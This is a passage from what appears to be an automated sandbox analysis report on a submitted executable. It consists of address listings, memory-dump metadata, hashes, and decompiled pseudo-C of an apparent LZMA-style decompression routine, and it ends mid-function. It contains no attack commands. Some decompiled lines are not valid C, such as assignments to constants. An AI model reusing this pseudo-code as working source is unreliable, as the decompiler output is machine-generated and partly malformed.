                                                                                                                                                                            0x004067db
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406817
                                                                                                                                                                            0x00406843
                                                                                                                                                                            0x00406845
                                                                                                                                                                            0x0040684c
                                                                                                                                                                            0x0040684f
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406859
                                                                                                                                                                            0x0040685c
                                                                                                                                                                            0x00406863
                                                                                                                                                                            0x00406866
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406896
                                                                                                                                                                            0x00406899
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x004068a1
                                                                                                                                                                            0x004068a4
                                                                                                                                                                            0x004068a7
                                                                                                                                                                            0x004068aa
                                                                                                                                                                            0x004068ad
                                                                                                                                                                            0x004068b0
                                                                                                                                                                            0x004068b3
                                                                                                                                                                            0x004068b6
                                                                                                                                                                            0x004068b9
                                                                                                                                                                            0x004068bc
                                                                                                                                                                            0x004068d5
                                                                                                                                                                            0x004068d7
                                                                                                                                                                            0x004068da
                                                                                                                                                                            0x004068db
                                                                                                                                                                            0x004068de
                                                                                                                                                                            0x004068e0
                                                                                                                                                                            0x004068e3
                                                                                                                                                                            0x004068e5
                                                                                                                                                                            0x004068e7
                                                                                                                                                                            0x004068ea
                                                                                                                                                                            0x004068ec
                                                                                                                                                                            0x004068ef
                                                                                                                                                                            0x004068f3
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f6
                                                                                                                                                                            0x004068f9
                                                                                                                                                                            0x004068fc
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068c6
                                                                                                                                                                            0x004068cb
                                                                                                                                                                            0x004068cd
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068ff
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x0040681c
                                                                                                                                                                            0x0040681e
                                                                                                                                                                            0x00406821
                                                                                                                                                                            0x00406824
                                                                                                                                                                            0x00406827
                                                                                                                                                                            0x00406829
                                                                                                                                                                            0x0040682c
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406835
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x0040652d
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406536
                                                                                                                                                                            0x00406539
                                                                                                                                                                            0x0040653c
                                                                                                                                                                            0x0040653f
                                                                                                                                                                            0x00406542
                                                                                                                                                                            0x00406545
                                                                                                                                                                            0x00406547
                                                                                                                                                                            0x0040654a
                                                                                                                                                                            0x0040654d
                                                                                                                                                                            0x00406550
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                                                                                                                                                            • Instruction ID: d456333056e0522eb9a81365918d8492ce98a85054e5b278218ea4b7938feab7
                                                                                                                                                                            • Opcode Fuzzy Hash: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                                                                                                                                                            • Instruction Fuzzy Hash: E1814671D04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C778AA96DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E00406195(void* __ecx) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				unsigned int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v95;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				void _v140;
                                                                                                                                                                            				void* _v148;
                                                                                                                                                                            				signed int _t537;
                                                                                                                                                                            				signed int _t538;
                                                                                                                                                                            				signed int _t572;
                                                                                                                                                                            
                                                                                                                                                                            				_t572 = 0x22;
                                                                                                                                                                            				_v148 = __ecx;
                                                                                                                                                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                                                                            				if(_v52 == 0xffffffff) {
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L3:
                                                                                                                                                                            					_t537 = _v140;
                                                                                                                                                                            					if(_t537 > 0x1c) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BE7))) {
                                                                                                                                                                            						case 0:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v116 = _v116 + 1;
                                                                                                                                                                            							_t537 =  *_v116;
                                                                                                                                                                            							__eflags = _t537 - 0xe1;
                                                                                                                                                                            							if(_t537 > 0xe1) {
                                                                                                                                                                            								goto L174;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t542 = _t537 & 0x000000ff;
                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_pop(_t576);
                                                                                                                                                                            							_push(9);
                                                                                                                                                                            							_pop(_t577);
                                                                                                                                                                            							_t622 = _t542 / _t576;
                                                                                                                                                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                                                                            							_v64 = _t617;
                                                                                                                                                                            							_v32 = (1 << _t622) - 1;
                                                                                                                                                                            							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                                                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                                                                            							__eflags = 0x600 - _v124;
                                                                                                                                                                            							if(0x600 == _v124) {
                                                                                                                                                                            								L12:
                                                                                                                                                                            								__eflags = _t625;
                                                                                                                                                                            								if(_t625 == 0) {
                                                                                                                                                                            									L14:
                                                                                                                                                                            									_v76 = _v76 & 0x00000000;
                                                                                                                                                                            									_v68 = _v68 & 0x00000000;
                                                                                                                                                                            									goto L17;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								}
                                                                                                                                                                            								do {
                                                                                                                                                                            									L13:
                                                                                                                                                                            									_t625 = _t625 - 1;
                                                                                                                                                                            									__eflags = _t625;
                                                                                                                                                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                                                                            								} while (_t625 != 0);
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v8;
                                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                                            								GlobalFree(_v8); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            							__eflags = _t537;
                                                                                                                                                                            							_v8 = _t537;
                                                                                                                                                                            							if(_t537 == 0) {
                                                                                                                                                                            								goto L174;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v124 = 0x600;
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 1:
                                                                                                                                                                            							L15:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 1;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                                                                            							_v116 = _v116 + 1;
                                                                                                                                                                            							_t50 =  &_v76;
                                                                                                                                                                            							 *_t50 = _v76 + 1;
                                                                                                                                                                            							__eflags =  *_t50;
                                                                                                                                                                            							L17:
                                                                                                                                                                            							__eflags = _v76 - 4;
                                                                                                                                                                            							if(_v76 < 4) {
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t550 = _v68;
                                                                                                                                                                            							__eflags = _t550 - _v120;
                                                                                                                                                                            							if(_t550 == _v120) {
                                                                                                                                                                            								L22:
                                                                                                                                                                            								_v76 = 5;
                                                                                                                                                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                                                                            								goto L25;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v12;
                                                                                                                                                                            							_v120 = _t550;
                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                            								GlobalFree(_v12); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                                                                            							__eflags = _t537;
                                                                                                                                                                            							_v12 = _t537;
                                                                                                                                                                            							if(_t537 == 0) {
                                                                                                                                                                            								goto L174;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L22;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 2:
                                                                                                                                                                            							L26:
                                                                                                                                                                            							_t557 = _v100 & _v32;
                                                                                                                                                                            							_v136 = 6;
                                                                                                                                                                            							_v80 = _t557;
                                                                                                                                                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                                                                            							goto L135;
                                                                                                                                                                            						case 3:
                                                                                                                                                                            							L23:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 3;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_t72 =  &_v116;
                                                                                                                                                                            							 *_t72 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t72;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							L25:
                                                                                                                                                                            							_v76 = _v76 - 1;
                                                                                                                                                                            							__eflags = _v76;
                                                                                                                                                                            							if(_v76 != 0) {
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L26;
                                                                                                                                                                            						case 4:
                                                                                                                                                                            							L136:
                                                                                                                                                                            							_t559 =  *_t626;
                                                                                                                                                                            							_t610 = _t559 & 0x0000ffff;
                                                                                                                                                                            							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                                                                            							__eflags = _v16 - _t591;
                                                                                                                                                                            							if(_v16 >= _t591) {
                                                                                                                                                                            								_v20 = _v20 - _t591;
                                                                                                                                                                            								_v16 = _v16 - _t591;
                                                                                                                                                                            								_v68 = 1;
                                                                                                                                                                            								_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                            								__eflags = _t560;
                                                                                                                                                                            								 *_t626 = _t560;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v20 = _t591;
                                                                                                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                                                                                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                            								goto L142;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L140;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 5:
                                                                                                                                                                            							L140:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 5;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_t464 =  &_v116;
                                                                                                                                                                            							 *_t464 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t464;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							L142:
                                                                                                                                                                            							_t561 = _v136;
                                                                                                                                                                            							goto L143;
                                                                                                                                                                            						case 6:
                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                            								__ecx = _v60;
                                                                                                                                                                            								_v56 = 1;
                                                                                                                                                                            								_v136 = 7;
                                                                                                                                                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                                                                            								goto L135;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v96 & 0x000000ff;
                                                                                                                                                                            							__esi = _v100;
                                                                                                                                                                            							__cl = 8;
                                                                                                                                                                            							__cl = 8 - _v64;
                                                                                                                                                                            							__esi = _v100 & _v28;
                                                                                                                                                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                                                                            							__ecx = _v64;
                                                                                                                                                                            							__esi = (_v100 & _v28) << 8;
                                                                                                                                                                            							__ecx = _v8;
                                                                                                                                                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                                                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                                                                            							__eflags = _v60 - 4;
                                                                                                                                                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                            							if(_v60 >= 4) {
                                                                                                                                                                            								__eflags = _v60 - 0xa;
                                                                                                                                                                            								if(_v60 >= 0xa) {
                                                                                                                                                                            									_t103 =  &_v60;
                                                                                                                                                                            									 *_t103 = _v60 - 6;
                                                                                                                                                                            									__eflags =  *_t103;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_v60 = _v60 - 3;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v60 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v56 - __edx;
                                                                                                                                                                            							if(_v56 == __edx) {
                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                            								__ebx = 1;
                                                                                                                                                                            								goto L63;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v24;
                                                                                                                                                                            							__eax = _v24 - _v48;
                                                                                                                                                                            							__eflags = __eax - _v120;
                                                                                                                                                                            							if(__eax >= _v120) {
                                                                                                                                                                            								__eax = __eax + _v120;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v12;
                                                                                                                                                                            							__ebx = 0;
                                                                                                                                                                            							__ebx = 1;
                                                                                                                                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            							goto L43;
                                                                                                                                                                            						case 7:
                                                                                                                                                                            							__eflags = _v68 - 1;
                                                                                                                                                                            							if(_v68 != 1) {
                                                                                                                                                                            								__eax = _v40;
                                                                                                                                                                            								_v132 = 0x16;
                                                                                                                                                                            								_v36 = _v40;
                                                                                                                                                                            								__eax = _v44;
                                                                                                                                                                            								_v40 = _v44;
                                                                                                                                                                            								__eax = _v48;
                                                                                                                                                                            								_v44 = _v48;
                                                                                                                                                                            								__eax = 0;
                                                                                                                                                                            								__eflags = _v60 - 7;
                                                                                                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            								__al = __al & 0x000000fd;
                                                                                                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                            								__eax = _v8 + 0x664;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								_v92 = __eax;
                                                                                                                                                                            								goto L71;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v8;
                                                                                                                                                                            							__ecx = _v60;
                                                                                                                                                                            							_v136 = 8;
                                                                                                                                                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                                                                            							goto L135;
                                                                                                                                                                            						case 8:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                            								__ecx = _v60;
                                                                                                                                                                            								_v136 = 0xa;
                                                                                                                                                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax = _v60;
                                                                                                                                                                            								__ecx = _v8;
                                                                                                                                                                            								__eax = _v60 + 0xf;
                                                                                                                                                                            								_v136 = 9;
                                                                                                                                                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                                                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L135;
                                                                                                                                                                            						case 9:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								goto L92;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v100;
                                                                                                                                                                            							if(_v100 == 0) {
                                                                                                                                                                            								goto L174;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                            							__eflags = _v60 - 7;
                                                                                                                                                                            							_t264 = _v60 - 7 >= 0;
                                                                                                                                                                            							__eflags = _t264;
                                                                                                                                                                            							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                                                                            							_v60 = _t264 + _t264 + 9;
                                                                                                                                                                            							goto L78;
                                                                                                                                                                            						case 0xa:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								__eax = _v8;
                                                                                                                                                                            								__ecx = _v60;
                                                                                                                                                                            								_v136 = 0xb;
                                                                                                                                                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                                                                            								goto L135;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v44;
                                                                                                                                                                            							goto L91;
                                                                                                                                                                            						case 0xb:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								__ecx = _v40;
                                                                                                                                                                            								__eax = _v36;
                                                                                                                                                                            								_v36 = _v40;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax = _v40;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v44;
                                                                                                                                                                            							_v40 = _v44;
                                                                                                                                                                            							L91:
                                                                                                                                                                            							__ecx = _v48;
                                                                                                                                                                            							_v48 = __eax;
                                                                                                                                                                            							_v44 = _v48;
                                                                                                                                                                            							L92:
                                                                                                                                                                            							__eax = _v8;
                                                                                                                                                                            							_v132 = 0x15;
                                                                                                                                                                            							__eax = _v8 + 0xa68;
                                                                                                                                                                            							_v92 = _v8 + 0xa68;
                                                                                                                                                                            							goto L71;
                                                                                                                                                                            						case 0xc:
                                                                                                                                                                            							L102:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0xc;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t340 =  &_v116;
                                                                                                                                                                            							 *_t340 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t340;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							__eax = _v48;
                                                                                                                                                                            							goto L104;
                                                                                                                                                                            						case 0xd:
                                                                                                                                                                            							L39:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0xd;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t127 =  &_v116;
                                                                                                                                                                            							 *_t127 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t127;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							L41:
                                                                                                                                                                            							__eax = _v68;
                                                                                                                                                                            							__eflags = _v76 - _v68;
                                                                                                                                                                            							if(_v76 != _v68) {
                                                                                                                                                                            								goto L50;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                            								goto L56;
                                                                                                                                                                            							}
                                                                                                                                                                            							L43:
                                                                                                                                                                            							__eax = _v95 & 0x000000ff;
                                                                                                                                                                            							_v95 = _v95 << 1;
                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                                                                            							_v76 = __eax;
                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                            							__esi = _v92 + __eax * 2;
                                                                                                                                                                            							_v20 = _v20 >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								_v68 = 1;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                            							_v72 = __ebx;
                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                            								goto L41;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L39;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0xe:
                                                                                                                                                                            							L48:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0xe;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
